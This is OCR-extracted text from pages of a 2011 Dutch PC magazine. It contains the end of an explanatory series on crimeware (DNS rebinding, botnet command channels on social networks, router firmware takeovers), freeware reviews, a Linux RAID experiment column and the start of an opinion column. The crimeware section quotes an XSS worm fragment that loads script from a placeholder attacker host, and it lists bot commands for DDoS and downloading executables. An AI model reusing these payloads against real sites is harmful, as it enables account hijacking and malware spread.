browsers is geïmplementeerd. Dat beleid houdt in dat een script alleen toegang heeft tot de eigenschappen van documenten met dezelfde oorsprong of host (same origin) als het script. Een probleem, aangezien het botscript van site A dan niet de reply’s van de doelwitsite kan verwerken. Bots kunnen hiervoor echter een dns-rebinding-aanval uitvoeren, waarbij
WAPkitting: uw router, mijn firmware het script ervoor zorgt dat de browser twee verschillende ip-adressen aan hetzelfde domein koppelt. Dat kan door de eerste dns-response (waarbij ip-adres X aan site A wordt gebonden) een uiterst korte ttl (time to live) mee te geven, zodat de browser gedwongen wordt een tweede dns-query uit te sturen, waarna ip-adres Y wordt doorgegeven. Voor de browser lijkt het dan alsof beide – zowel het script op adres X als de webpagina op adres Y – tot dezelfde ‘oorsprong’ (host A) behoren. Dns pinning, waarbij een dns-response gecacht wordt zodat daaropvolgende query’s lokaal worden afgehandeld, helpt maar ten dele gezien bots ook browserplug-ins kunnen inschakelen die over een eigen dns pin-database beschikken. Meer technische feedback over dns -rebinding vindt u nog in een – uitstekende – paper van de Stanford University op tinyurl.com/dns-rebinding. Uit de beschrijving van de topologieën hebt u ongetwijfeld al kunnen afleiden dat ook p2p-protocollen een dankbaar kanaal zijn voor botnets, gezien het decentrale karakter ervan. In zo’n constructie worden de C&C-instructies voor de bots via bestandsdeling doorgegeven. Weliswaar niet meteen de ideale situatie voor een getimede DDoS-aanval, maar dat hoeft niet echt een probleem te zijn omdat er genoeg andere
Twee populaire topologieën: multiserver (l) en hiërarchisch (r)
PC-ACTIVE | Nr. 245 – 2011
508 crimeware 3.indd 87
87
11-02-2011 09:40:29
| CRIMEWARE
(Bron: usenix.org)
ACHTERGROND
Een DDoS-aanval, gelanceerd vanaf een multiserver IRC-botnet
lucratieve uitwegen zijn. Op tinyurl.com/p2p-botnets vindt u een overzicht van p2p-botnets, evenals een interessante casus rond de bot Trojan.Peacomm, die zich van het Overnet (eDonkey) p2p-protocol bedient.
Sociale netwerken
(Bron: Stanford University)
Het zal u niet verbazen dat botnets intussen ook sociale netwerken hebben ontdekt als C&C-kanaal. Dergelijke netwerken beschikken namelijk doorgaans over een goed uitgebouwde architectuur en solide
internetverbindingen. Enkele voorbeelden zijn Trojan. Whitewell, die het op Facebook had gemunt (oktober 2009; een analyse door Symantec vindt u op tinyurl.com/whitewell), en (een variant van) Brazilian Banker die Orkut voor zijn kar spande (juli 2010). Beide gingen op vergelijkbare manier te werk. Ze creëerden een account en plaatsten versleutelde instructies in tekstvorm op het accountprofiel. De software op geïnfecteerde machines zocht vervolgens op dit profiel naar een specifieke tekststring, waarna
DNS rebinding maakt ook intranetsites tot doelwit van een externe locatie
88
PC-ACTIVE | Nr. 245 – 2011
508 crimeware 3.indd 88
11-02-2011 09:40:54
CRIMEWARE
de instructies achter deze string werden ingelezen en vervolgens lokaal werden ontsleuteld en uitgevoerd. Voor deze bots was weliswaar een specifiek account bij het sociale netwerk nodig. Een SPOF dus, wat maakte dat het voldoende was de accounts te blokkeren om de bot onschadelijk te maken. En om dat te omzeilen is op www.digininja.org de proof-of-concept bot KreisosC2 voor het Twitter-netwerk in ontwikkeling.
Sociale netwerken: gretige prooi voor botnets! Die weet instructies aan gewone taal te koppelen (zoals ‘check out this link’), zodat de botmaster niet langer aan specifieke accounts gebonden is voor de verspreiding van de code. De bot hoeft alleen maar naar de afgesproken tekst te zoeken op bezochte profielen en na te gaan of er iets met de achterliggende codestring te doen valt. Met versie 3 van de KreisosC2 is het eveneens mogelijk de instructies als commentaar in ‘leuke’ en dus veel verspreide jpg-plaatjes op te nemen, en dan komt ook het populaire zakelijke netwerk LinkedIn in het vizier… Dergelijke technieken komen trouwens langzaamaan ook binnen het bereik van scriptkiddy’s. Zo werd in mei 2010 de tool TwitterNET Builder gepubliceerd. Het was alleen maar nodig de naam van een Twitterprofiel in te vullen waarna de tool een exebestand genereerde dat allerlei code in het betreffende profiel plaatste zodra het slachtoffer dat bestand opstartte. Wat simpele social engineering – ‘start deze bijlage op om een leuk filmpje te zien’ – was alles. Vervolgens hoefde de aanvaller maar een of andere opdracht naar de Twitter-feed van het slachtoffer te posten, die de bot dan braafjes uitvoerde. De commando’s spreken voor zich:
| ACHTERGROND
in hun adresbalk plakken en uitvoeren terwijl ze bij Orkut zijn aangemeld (juni 2010)… Het kan natuurlijk ook zonder actieve participatie van nietsvermoedende gebruikers. Zo zijn er verschillende gevallen bekend van xss-aanvallen (cross-site scripting), waaronder op het Twitter-netwerk (zomer 2010). Hierbij werd malafide javascript-code als plaintext in een tweet gestopt die dan in de browser van andere gebruikers kon worden uitgevoerd. Een van de bekendste xss-wormen is Mikeyy, die uitvoerbare code plaatste achter het CSS color-attribuut in een Twitter-profiel: <style type="tekst/css"> a { color: # mikeyy "><script script src=http://aanvaller.com/script.js> Het mag duidelijk zijn dat ook csrf-aanvallen (crosssite request forgery) hier goede kansen zien. Immers, wanneer een gebruiker een (verborgen) script op een website uitvoert terwijl hij nog bij een sociaal netwerk is aangemeld, zal dat netwerk er geen probleem mee hebben instructies van dat script – zoals het posten van commentaar of het toevoegen van vrienden – uit te voeren. Immers, voor het sociale netwerk lijkt het
PROBEER NU! DRIE DAGEN GRATIS
.DDOS*IP*PORT, .VISIT*.www.site.com, .DOWNLOAD*www.site.com/bestand.exe,... Profielen op sociale netwerken blijken trouwens niet alleen een handig vehikel voor C&C-instructies. Zo kan er allerlei malafide inhoud aan profielpagina’s worden toegevoegd, hetzij op dummy-accounts, op geïnfecteerde accounts of via script gebaseerde aanvallen. De meeste sociale netwerken voorzien namelijk in een of ander API (application programming interface) die u toelaten allerlei functies via scripting te benaderen, wat meteen de deur opent voor allerlei malversaties. De minst gesofisticeerde vormen van een scriptaanval zijn die waarbij het slachtoffer aangespoord wordt de code zelf te kopiëren en uit te voeren. Een bekend voorbeeld is een javascriptje, bedoeld voor Orkut, dat gebruikers ‘extra belkrediet oplevert’ als ze de code
Wel zo comfortabel: een ingang op afstand via remote management…
alsof de gebruiker zelf om die handelingen vraagt. Csrf-aanvallen zijn overigens ook al in combinatie met click jacking uitgevoerd. In dit geval wordt een bezoeker op een malafide site gevraagd bepaalde links of hotspots of een foto aan te klikken – uiteraard met aantrekkelijke beloftes voor wat volgt… Wat de bezoeker niet weet, is dat scripts ervoor zorgen dat hij tegelijk ook klikt op onzichtbare knoppen (in een apart frame) die welke aanpassingen dan ook aan zijn profiel kunnen doorvoeren. De installatie van een browserplug-in als NoScript kan u helpen zulke onzichtbare frames te detecteren.
Firmware Cybercriminelen richten hun pijlen weliswaar in eerste instantie op conventionele computersystemen, maar sinds allerlei embedded systemen met internetverbinding stevig in opmars zijn, zijn ook die potentiële doelwitten. Heel vaak namelijk kan de firmware van zulke systemen (op EEPROMS of flashgeheugen) worden gepatcht of geüpdatet en dat biedt uiteraard perspectieven. Niet alleen voor alternatieve updatekanalen – we stellen u de populaire projecten als Rockbox (www.rockbox.org) of DD-WRT (www.dd-wrt.com) voor! –, maar dus ook voor crimeware. Met name routers en AP’s zijn interessant, aangezien
90
die netwerkservices bieden aan verschillende clients. Wanneer een aanvaller erin slaagt de firmware in zulke apparaten te compromitteren, dan is hij meteen verzekerd van een comfortabele mitm-positie (man in the middle). In het vorige deel van deze minireeks hebben we het al uitvoerig gehad over Drive-by pharming met behulp van een WAPJack-aanval. Het komt erop neer dat de aanvaller de configuratie-instellingen van de router op afstand weet aan te passen, en met name de dns-server omleidt. Hoe dat precies mogelijk is, kon u ook in dat artikel lezen. In eenzelfde moeite door kan de aanvaller natuurlijk ook de remote beheermodule van de router activeren zodat hij die op elk moment via het internet kan herconfigureren. Ook het scenario waarbij een aanvaller zich fysiek in de buurt van een of meer draadloze routers bevindt en daarop de functie wireless bridging – indien beschikbaar – activeert om de zo de internetverbinding van die routers (en dus van de achterliggende wlan’s) via zijn eigen netwerkje te laten verlopen, valt niet uit te sluiten. Een nog drastischer aanval is het zogenoemde WAPkitting, een versmelting van wardriving, WAP en rootkitting. Hierbij wordt de firmware van de draadloze router of AP door een gemodificeerde versie vervangen. De aanvaller gaat hiervoor vaak zelf
PC-ACTIVE | Nr. 245 – 2011
508 crimeware 3.indd 90
11-02-2011 09:41:58
CRIMEWARE
ter een tcp-request, gericht aan een specifieke site, opmerkt, injecteert die een gespooft tcp ack-pakketje dat uiteraard naar een andere locatie – uiteraard een phishing site – verwijst. Volgens onderzoekers van de Indiana University valt het zelfs niet uit te sluiten dat een gecompromitteerde router zijn eigen firmware verspreidt naar andere draadloze netwerken die in het bereik liggen. Zo’n verspreiding zou in theorie zelfs epidemische vormen kunnen aannemen, op voorwaarde dat er genoeg onvoldoende beveiligde routers worden gevonden!
Ten slotte In deze minireeks hebben we u een aantal belangwekkende crimeware-scenario’s voorgesteld. Denk overigens niet dat ons overzicht op enigerlei manier volledig is. Er zijn nog heel wat andere denkbare of al in de praktijk uitgevoerde aanvallen mogelijk. Zo hebben we het bijvoorbeeld nauwelijks of niet gehad over crimeware in of via mobiele apparaten. Het zou ons daarom niet verbazen als we over enkele maanden al de noodzaak voelen een vierde deel aan deze crimeware-reeks toe te voegen, waarbij apps in smartphones, iPads en tablets een hoofdrol spelen of waarbij we uitgekiende aanvallen op rfid’s doorlichten!
(bron: Indiana University)
op stap met laptop, wlan-detectietools en een krachtige antenne, op zoek naar kwetsbare apparaten, met name die waar het administratorwachtwoord nog op de standaardwaarde staat ingesteld of een exemplaar dat makkelijk te kraken valt, bijvoorbeeld via een woordenboekaanval. Weet alvast wel dat ‘beveiligingen’ als het verbergen van de ssid, mac-filtering en wep-encryptie nauwelijks een barrière vormen voor een doorwinterde hacker! Zo gauw de firmware is vervangen, staat voor de aanvaller een waaier aan mogelijkheden open. In essentie is de router nu tot een zombie verworden die op afstand op allerlei instructies van de aanvaller kan reageren en bijvoorbeeld aan een georkestreerde DDoS-aanval kan deelnemen. De firmware kan ook zodanig zijn aangepast dat die automatisch alle sslverbindingen onderschept. Wanneer het slachtoffer dan zo’n ‘beveiligde’ connectie met de bank opzet, kan de firmware die aan de lan-zijde, dus tussen het slachtoffer en de router, in een niet-versleutelde verbinding omzetten en aan wan-zijde alsnog een sslconnectie opzetten. Op die manier krijgt de aanvaller meteen ook de id van het slachtoffer in handen. Een ander aanvalstype is het zogenoemde race pharming. Deze techniek manifesteert zich in een ‘race’ met het tcp-handshaking-mechanisme: zodra de rou-
| ACHTERGROND
First we take Manhattan: een gesimuleerde wifi-epidemie
PC-ACTIVE | Nr. 245 – 2011
508 crimeware 3.indd 91
91
11-02-2011 09:43:08
hcc!CompUsers
info: www.CompUsers.nl
Mousotron inSSIDer: handige draadloos netwerkscanner Marius HR Lambers
Wie onderweg gebruik wil maken van draadloze netwerken (WLAN), vindt in inSSIDer een handig programmaatje om in beeld te krijgen welke AccessPoints (AP’s) er ter plaatse of langs je route in de lucht zijn. Het - óók Nederlandstalige - freewareprogramma inSSIDer is een veelzijdiger vervanger van Netstumbler (alléén XP) en Vistumbler (alléén Vista). Het geeft niet alleen informatie over welke draadloze netwerken er in de omgeving zijn, maar ook informatie over o.a. beveiliging, snelheid, signaalsterkte, kanaal en (na aansluiting van een GPS-muis) geografische coördinaten van positie bij detectie van een netwerk. Deze gegevens worden getoond in tabelvorm, met de mogelijkheid om te sorteren op de waarden in elke kolom. Een aardige functie is de grafische weergave van de signaalsterkte van de geselecteerde AP’s (selectie met vinkjes) . Één grafiek geeft de signaalsterkte van de geselecteerde AP’s aan, afgezet tegen de tijd. De andere grafiek geeft de signaalsterkte (in dBm) van de geselecteerde AP’s aan, afgezet tegen het zendkanaal. De signaalsterkte van het ontvangen signaal wordt in de tabel aangegeven als Receive Signal Strength Indicator (RSSI). RSSI levert meetwaarden, die helaas moeilijk tussen WLAN-adapters vergelijkbaar zijn, omdat de makers van de chips in de WLAN-adapters verschillende getallen hanteren voor de aanduiding van de maximale signaalsterkte (voor de liefhebbers: http://www.wildpackets.com/elements/...gth.pdf#page=5). De verzamelde gegevens kunnen worden geëxporteerd in twee formaten: NS1 (Netstumbler) en KML (Google KeyHole MarkUp Language). Het NS1-bestand kan worden ingelezen met Netstumbler (inSSIDer zelf kan geen bestanden inlezen!). De KML-versie kan worden gebruikt voor navigatie en afbeelding op een kaart. Dit programma is bruikbaar met Windows XP / Windows Vista / Windows 7 (ook 64-bits). Je kunt inSSIDer hier downloaden: http://www.metageek.net/products/inssider Veel plezier ermee!
Mousotron houdt bij welke afstand je muis loopt en hoe vaak je erop klikt. En hoeveel toetsaanslagen je maakt. Het is niet alleen vermaak, het kan ook gebruikt worden om RSI te voorkomen. Wil je weten wat een ander doet met zijn muis? Dan kan Mousotron je gegevens op internet plaatsen en kun je je prestaties met die van anderen vergelijken. GigaHits 2011-1: Hardware/Muis/Mousotron 6.0
SlimComputer 1.0
O
A va h
H w d ke m te n d
Nieuwe computer gekocht? Vol met software waar je niet voor betalen wilt? Bezoekers van de CompUserdagen in de Bilt of HCCdigital hebben in 2010 kennis kunnen maken met het fenomeen 'Bloatware' en het programma Pcdecrapifier om die rommel op te kunnen ruimen. Het nieuwe SlimComputer beweert hetzelfde te kunnen. GigaHits 2011-1: Windows/Tweak en Tune/SlimComputer 1.0
SpaceSniffer Met de portable tool (dus niet installeren) SpaceSniffer heb je in no time een goed overzicht van de ruimteverslinders op je harddisk. Hoe groter een blok, hoe meer ruimte ingenomen wordt. Klik op een blok en je zoomt in op de gegevens. Het is ook mogelijk te filteren op bepaalde bestanden. GigaHits 2011-1: Bestandsbeheer/Beheer disks/SpaceSniffer 1.1.2.0
106 DOSgg.indd 92
L ch va a tr ri U o U
10-02-2011 14:40:53
E st n w st d ce je
l
t
hcc!CompUsers is de grootste interessegroep van de HCC. De activiteiten zijn gericht op het thuisgebruik van computers, vooral op besturingssystemen en een breed terrein van toepassingen. Op deze pagina's kun je kennismaken met het 'aanbod' van kennisoverdracht en diensten. Info: www.CompUsers.nl.
Op GigaHits 2011-1 wilden we demonstreren dat Linux helemaal niet moeilijk is. En evenmin alleen bedoeld is voor 'gewichtige' zaken. Daarom hebben we gekozen voor een Linux-distributie met alleen spellen. Live.linuX-gamers.net is gebaseerd op archELinux, een 'embedded' Linux afgeleid van Arch Linux. Arch Linux staat bekend als een kleine, maar heel snelle, Linux-distributie. Op de GigaHits is de 'lite' uitvoering van live.linuX-gamers.net geplaatst. Uiteraard bootable. Het is ook mogelijk om live.linuX-gamers.net bootable op een USB-stick te plaatsen.
Opstarten Als je weet hoe je je pc moet opstarten van een CD- of DVD-ROM, is het verder heel gemakkelijk. Het opstarten gaat vrij snel. Maar 'onderweg' krijg je nog wel enige opties. Je kunt de taal van je toetsenbord kiezen. De keuze aan talen is vrij beperkt. Als meerdere geluidskaarten worden gedetecteerd, kun je hieruit kiezen, en ook kunnen er vragen komen met betrekking tot de videokaart.
Al vrij snel zal het systeem opgestart zijn. Geen vragen over naam en wachtwoord. Je ziet een vrij lege 'desktop' met rechts Eventueel moeten nog videodrivers geïneen rij icoontjes en onderaan een rij stalleerd worden voor ATI of Nvidia. Schrik icoontjes. Als je met de muis over de niet, want als je overal 'ja' op zegt, dan icoontjes gaat, worden ze groter. De wordt alles voor je gedaan. De drivers icoontjes rechts op het scherm starten distaan op de disc. Dat installeren van video- verse nuttige toepassingen op. drivers heeft vooral te maken met de licenties van de videochipfabrikanten, waar je 'ja' op moet zeggen. is de DVD-ROM bijlage bij de SoftwareBus, het magazine van hcc!CompUsers. Verkrijgbaar vanaf € 15 per jaar.
Zie: www.CompUsers.nl/eShop Spellen De bediening moet wel heel eenvoudig zijn. Er zijn geen bedieningsorganen te zien. Zelfs niet voor het uitzetten van het systeem! Het geheim: rechtsklik van de muis op de desktop (werkt niet in de spellen). Er verschijnt dan een menu, zie screenshot bovenaan deze pagina. Hier kun je alle spellen en toepassingen starten, het systeem opnieuw opstarten of uitzetten.
106 DOSgg.indd 93
Op de 'lite' uitvoering staan 17 spellen. Als je meer wilt, dan is de DVD-uitvoering beschikbaar met nog eens zo'n twintig spellen (http://live.linux-gamers.net). Dit zijn de beschikbare spelen van de 'lite' uitvoering: Armagetron Advanced - Tron-like AstroMenace - space shooter Blobby Volley 2 - beach ball Chromium B.S.U. - space shooter Extreme Tux Racer - downhill racing foobillard - billard Frozen Bubble - puzzle LBreakout2 - Breakout-like, puzzle LTris - Tetris-like Neverball - puzzle Neverputt - minigolf Osmos (demo) - ambient puzzle Pingus - Lemmings-like, puzzle Secret Maryo Chronicles - jump and run Teeworlds - action World of Goo (Demo) - puzzle XMoto - motocross Opstarten van de spellen doe je door op de icoontjes onderaan het scherm te klikken, of door rechts op de desktop te klikken en uit het menu te kiezen. Om een spel te verlaten, kom je een heel eind met de Esc-toets en de muis.
10-02-2011 14:41:15
HET LAB TEKST : HENK VAN DE K AMER HENK @ HE TL AB . TK
Het mag bekend zijn dat een aantal van de maffe ideeën die ik regelmatig heb, de nodige tijd kosten. Deze maand het eerste deel van ruim anderhalf jaar nadenken en experimenteren: een namaak-Drobo.
MAF IDEE? Vaste lezers kennen mijn probleem. Regelmatig gooi ik planningen overhoop omdat zich nieuwe zaken of inzichten aandienen. Zo noemde ik vorige keer al de verbouwing [1] en het feit dat ik begin december grotendeels door mijn verplichtingen heen was en weer tijd begon te krijgen. De zomermaanden ben ik kwijtgeraakt door het meehelpen aan de nieuwe koers van PC-Active en de eerste twee maanden van het winterseizoen door het inhalen van de achterstand. Nu willen sommige lezers mij al opgeven voor ‘Help, mijn man is klusser!’ [2] en daar lijkt het af en toe wel op. Alleen heb ik met niemand rekening te houden behalve mijzelf! De allereerste klus eind 2007, toen ik mijn huis kocht, was dan ook het op orde brengen van de werk- en slaapkamer. Dat zijn de twee ruimtes waar ik de meeste tijd verblijf als ik niet aan het klussen ben. Ik kan dus prima leven, ook al omdat ik dingen waar mogelijk herstel om alles bewoonbaar te houden. Wanneer het huis klaar is, boeit mij eigenlijk niet. Tenslotte heb ik het gekocht om wat meer te bewegen en wat minder achter de computer te zitten. Wat wel boeit, is zorgen dat ik klussen zoveel mogelijk per seizoen afmaak en ook zo bekeken ben ik geen kandidaat voor het genoemde programma! Dit winterseizoen stond het casco afmaken van de nieuwe woonkeuken op stapel en met twee maanden achterstand bij aanvang heb ik besloten om daar alle vrije tijd in te stoppen. Idefix moet het nog wat langer met Windows uithouden!
Persconferentie Regelmatig komen bedrijven op de uitgeverij langs om te vertellen over nieuwe producten. En als ik dan toevallig in Haarlem ben, wil ik zo’n praatje wel
94
eens meepakken. Zo kwam ruim anderhalf jaar terug Drobo [3] langs met zijn nas-oplossing. Het intelligente daaraan is dat hun raid-systeem kan worden uitgebreid met een harde schijf van willekeurige grootte. Kenners zullen nu gaan steigeren en zeggen dat dit sowieso met elke raid-opstelling kan, maar ik was nog niet uitgesproken! Bij traditionele raid bepaalt de kleinste harde schijf de totale grootte die bereikt kan worden en Drobo beweerde dat in zijn systeem veel meer ruimte beschikbaar kwam. De rest van het praatje was ik met mijn gedachten ergens anders en na afloop had ik een oplossing bedacht. Uiteraard wilde ik u dat verhaal vertellen of nog beter het u thuis zelf laten nabouwen om zo te laten zien hoe slim de truc is. Alleen wie heeft thuis even vier harde schijven van verschillende groottes liggen? Na een weekje nadenken had ik de oplossing. Waarom niet usb-duimpjes gebruiken? Deze zijn weliswaar een heel stuk kleiner dan de gemiddelde schijf, maar voor de uitleg maakt het eigenlijk niets uit. En wie net zoals ik er niet vier heeft liggen, kan deze vast verzamelen. Voor mij was dat simpel een mailtje naar iedereen op de uitgeverij en een paar dagen later had ik zeventien stuks plus een paar usb-hubs om aan de slag te gaan. Een aantal van u heeft deze opstelling trouwens al gezien op de HCC Dagen in 2009.
Probleem Dat u het verhaal nooit in PC-Active hebt gelezen, komt door een aantal problemen waar ik tegenaan liep. Usb klinkt zo leuk, maar zoals altijd is de praktijk anders dan ons wordt beloofd. Als eerste experiment had ik twee even grootte – bijna dan, want het aantal bruikbare sectoren kan zelfs per exemplaar van
PC-ACTIVE | Nr. 245 – 2011
503 Het Lab-.indd 94
10-02-2011 14:44:30
HET LAB
dezelfde fabrikant verschillen – in een raid5-opstelling aan de praat. Ook hier gaan kenners wellicht protesteren, maar Linux kan deze bijzondere opstelling aan. Raid5 is eigenlijk bedoeld voor drie of meer harde schijven waarbij één wordt opgeofferd voor de herstelinformatie [4]. Dat kan ook met twee waarbij het geheel eigenlijk gedegradeerd wordt tot een raid1. Echter door het geheel meteen als raid5 aan te maken, wordt het systeem voorbereid op meer harde schijven in de toekomst. De opdracht luidt als volgt: keskonrix:~# mdadm --create /dev/md0 --level=5 --raid-disks=2 /dev/sda1 /dev/sdb1 Hierbij moeten sda1 en sdb1 exact even groot zijn en dat is op maagdelijke – ofwel niet geformatteerde en daar kom ik zo op terug – usb-sticks lastig omdat elk een andere indeling gebruikt als het gaat om cylinders, heads en sectoren. Dat is op te lossen door tijdens het aanmaken van de partities het geheel te dwingen tot dezelfde indeling: keskonrix:~# fdisk -H 64 -S 32 /dev/sda Dit geeft cylinders van exact 1 MiB en dat rekent weer handig. Deze aanroep hoeft trouwens maar één keer, want daarna haalt fdisk deze gegevens uit het weggeschreven mbr. Na afloop hebben we een /dev/md0partitie die de helft is wat grootte van beide partities betreft. Mocht u geen twee (bijna) identieke sticks hebben liggen, dan is dat geen enkel probleem. Op de grootste blijft dan gewoon de nodige vrije ruimte over na het aanmaken van een partitie die net zo groot is als op de kleinste. Het gaat er dus om dat sda1 en sdb1 exact evenveel sectoren bevatten. Tot zover weinig problemen, maar die ontstonden al snel bij het verder experimenteren. Net zoals intern in de Drobo gebeurt, willen we alle operaties live en zonder verlies van data doorvoeren. Daartoe heb ik op het geheel een serie bestanden aangemaakt en diens checksum vastgelegd. Na elke operatie kunnen we alles dan controleren en zo ontdekte ik dus een kink in de kabel. Als eerste vond ik dat de verzamelde usb-sticks ooit zijn gekregen op verschillende persconferenties. Blijkbaar worden daarvoor exemplaren gebruikt die kwalitatief minder goed zijn, want toen mijn experimenten maar bleven mislukken heb ik als eerste op alle zeventien exemplaren badblocks [5] gebruikt en konden vijf exemplaren meteen in de prullenbak! En voordat de genoemde kenners weer gaan steigeren, ja met raid kúnnen we defecte exemplaren gebruiken, totdat we dus het array gaan vergroten of verkleinen. Want dan hebben we tijdelijk geen raid meer en hangt het er dus vanaf welk exemplaar de data behoudt. Als dat het exemplaar is met defecte sectoren die blijkbaar niet worden gedetecteerd (!) tijdens het aanmaken of wegschrijven van de data, hebt u een probleem. Niet voor niets wordt altijd gezegd dat raid geen back-up is en dat u voor gevaarlijke
| ACHTERGROND
operaties met data zoiets eerst moet maken! Na het verwijderen van de exemplaren met defecte sectoren liep ik al snel tegen een volgend probleem aan. Weet u nog dat ons ooit is beloofd dat we maarliefst 127 apparaten per root hub – en moderne computers hebben er al snel vier of meer – kunnen aansluiten? Uiteraard heeft niemand dat ooit geprobeerd of als dat experiment wel is uitgevoerd, is er niet gecontroleerd wat er intern allemaal gebeurt. Bij usb zal elke wijziging – en dat kan ook komen door een stoorsignaal of dip in de voeding – ervoor zorgen dat de bus opnieuw wordt geïnitialiseerd. Klinkt goed, maar is desastreus voor raid. Want zodra dat gebeurt, is de synchronisatie verbroken en hebben we een kapotte array. U moet dan handmatig de synchronisatie gaan herstellen waarbij een van de harde schijven als ‘vervangen’ wordt aangemerkt. Zodra we drie of meer harde schijven hebben, blijkt dat raid5 bedoeld is om één defecte harde schijf te overleven en niet het plotseling uitvallen en weer online komen van alle. Soms heb ik mazzel, maar regelmatig kon ik opnieuw
HD1 HD2 md0
Figuur 1
HD1 HD2 HD3
Figuur 2
md0
HD1 HD2 HD3
Figuur 3
md0 md1
HD1 HD2 HD3
Figuur 4
HD4 md0 md1 md2
HD1 HD2 HD3 HD4 md0 md1 md2
Figuur 5
PC-ACTIVE | Nr. 245 – 2011
503 Het Lab-.indd 95
95
10-02-2011 14:46:20
ACHTERGROND
| HET LAB
beginnen. Mijn droom om een super array te maken met de genoemde 127 – een deel daarvan zal opgeofferd moeten worden voor hubs – apparaten hebben we maar laten varen. Tegen dat soort maffe ideeën zijn moderne computers ondanks de beloftes van de makers blijkbaar niet bestand.
Oplossing Het mag duidelijk zijn waarom het experiment anderhalf jaar lang in de kast is verdwenen. Ik kan u tenslotte niet opzadelen met iets wat maar half werkt. De oplossing is de virtuele computer die ik u een aantal afleveringen terug cadeau deed. Want ook daarmee is het heel simpel om nieuwe harde schijven aan te maken en zo een Drobo na te bouwen. Nu was de tijd te kort om deze nog mee te nemen op de cd-rom bij dit nummer, dus ga ik het voor deze maand wat theoretisch houden en u het volgende maand in de praktijk te laten zien. Laten we beginnen met een tweetal schijven van 4 en 6 GiB elk. Het moge duidelijk zijn dat we via de raid5truc een tegen rampen beschermde virtuele harde schijf kunnen maken van 4 GiB. Op de tweede schijf blijft dan nog 2 GiB ongebruikt over. Het resultaat is getekend in figuur 1 waarbij we voor het bruikbare deel paarsblauw en voor het niet gebruikte deel lichtgeel hebben gekozen. In de simpelste Drobo kunnen vier harde schijven, dus laten we in onze nabouw eens een derde schijf van zeg 8 GiB toevoegen. Het is duidelijk dat we hierop een 4 GiB grote partitie kunnen maken en deze aan /dev/md0 toevoegen. Deze wordt dan tweemaal 4 GiB groot, want het derde deel wordt weer gebruikt voor de bescherming tegen één uitvallende harde schijf. Het resultaat ziet u in figuur 2. Wie goed kijkt, ziet waarschijnlijk ook de truc die Drobo gebruikt. Inderdaad op de 6 en 8 GiB schijf is nog een deel vrij waar we een nieuwe raid met slechts twee fysieke stukken kunnen aanmaken. Onder Linux wordt dat dan /dev/md1 en dit levert een 2 GiB bruikbare partitie op. Ondanks de complexe setup van /dev/md0 en /dev/md1 is het geheel in figuur 3 nog steeds beveiligd tegen het uitvallen van één harde schijf. Probeer het in gedachte maar eens uit. Dankzij deze slimme truc van het creatief gebruiken van de vrije ruimte op de grotere harde schijf hebben we nu niet 8 maar 10 GiB beschikbaar gekregen. Dit gaat op voor willekeurige groottes van de gebruikte harde schijven. Het totaal wordt de som van de schijven minus de grootste. Deze laatste zorgt als het ware voor de beveiliging tegen uitval. Kunt u al raden hoe groot het totaal wordt als we een vierde disk toevoegen van ze 8 GiB? Inderdaad 4 plus 6 plus 8 is 18 GiB en drie raid-partities en deze is te zin in figuur 4.
Doorschuiven Na het plaatsen van de vierde harde schijf zit het systeem vol. Maar houdt het daarbij op? Welnee! Schaf een 10 GiB schijf aan en vervang daarmee
96
het exemplaar van 4 GiB. Nu zou u kunnen denken dat we alles opnieuw moeten gaan indelen omdat /dev/md0 in feite uit vier stukken van 6 GiB gemaakt kan worden. Maar waarom zouden we? Op de nieuwe harde schijf maken we gewoon drie partities van 4, 2, 2 en 2 GiB en door even /dev/md0 te vertellen dat de nieuwe harde schijf gebruikt moet worden, kan de data op dit stuk zonder dat het geheel offline moet – uiteraard maken we wel een back-up – weer tot een beveiligd array gemaakt worden via de complete data op de andere drie. Dat kost wat tijd, maar na het toevoegen van de andere blokken hebben we door de vervanging opeens 6 plus 8 plus 8 is 22 GiB in plaats van 18 GiB. Het resultaat is in figuur 5 te zien. Daar gaan we het voor deze keer even bij laten. Volgende maand laten we zien dat de blokken dankzij LVM van een paar afleveringen terug [6] het geheel als virtuele harde schijf van 22 GiB gebruikt kan worden. En met behulp van VirtualBox kunnen we ook de nodige rampen simuleren.
INFORMATIE Oude afleveringen zijn ook na te lezen op de officiële Het Lab-website. De url is www.hetlab.tk/afleveringen/hetlab-jjjjmm waarin jjjj natuurlijk het jaar en mm de maand met voorloopnul is. Het juli/augustus-nummer is 07. [1] [2] [3] [4] [5] [6]
www.vandekamer.com/verbouwing/ www.rtl.nl/huistuinkeuken/helpmijnmanisklusser/ www.drobo.com/ www.hetlab.tk/afleveringen/hetlab-200010 www.hetlab.tk/keskonrix/badblocks-2 Het Lab, Henk van de Kamer, PC-Active oktober 2010 (#241), pag. 72-74
PC-ACTIVE | Nr. 245 – 2011
503 Het Lab-.indd 96
10-02-2011 14:50:02
COLUMN
WAMMES WITKOP
M
ocht u de game nog niet kennen, ik kan het van harte aanraden: Angry Birds. Het is doodsimpel: door vogeltjes met een katapult af te schieten moet u groene varkens belagen, die zich forten van hout, glas, beton en wat dies meer zij hebben verschanst. Sommige vogeltjes kunnen versnellen gedurende de vlucht, andere spatten in meer vogels uiteen als u op het schermpje tikt. Oh ja, Angry Birds speel je op een smartphone of tablet met een aanraakscherm. Het is een uiterst verslavend spelletje, alleen al de gratis probeerversie kan je dagen bezighouden als je je beseft dat elk fort met maar één enkel schot valt te slechten. Kwestie van precies de juiste plek met de juiste snelheid en invalshoek. Wie na de gratis velden wil, heeft keuze uit een hele reeks betaalversies, allemaal vreselijk grappig. Waarom die vogels zo gruwelijk boos zijn, dat wordt ook uitgelegd. U moet weten, de varkentjes hadden zo’n trek in wat lekkerders dan gras. Toen de vogeltjes even afgeleid waren was het leed al snel geschied, maar de varkens werden op heterdaad betrapt bij het bakken van de eitjes. Toen waren de rapen gaar. Wat Angry Birds zo vreselijk leuk maakt, is de verregaande fysische juistheid van de simulatie. De vluchtbaan vanaf de katapult is logisch en voldoet aan de wetten der zwaartekracht. Ook de forten storten in op een levensechte manier. Kortom, het perfecte spel om je eens fijn uit te leven. De logica die Angry Birds zo aantrekkelijk maakt, blijkt in het echte leven niet noodzakelijk op te gaan. In de politiek hebben varkens meer dan negen levens en storten forten krakend in – om vervolgens miraculeus weer te verrijzen. Trans Link Systems bijvoorbeeld is daar een prachtig voorbeeld van. Elke keer dat je verwacht dat het wangedrocht dat OV-chipkaart heet nu toch wel afdoende aan de kaak is gesteld, en de groene varkentjes de vlag zullen moeten strijken, blijkt de waarheid weggemoffeld te worden. Soms na wat bozige woorden uit de Haagse oppositie en voze beloftes van verantwoordelijke bewindspersonen, lijkt het onmogelijk de juiste 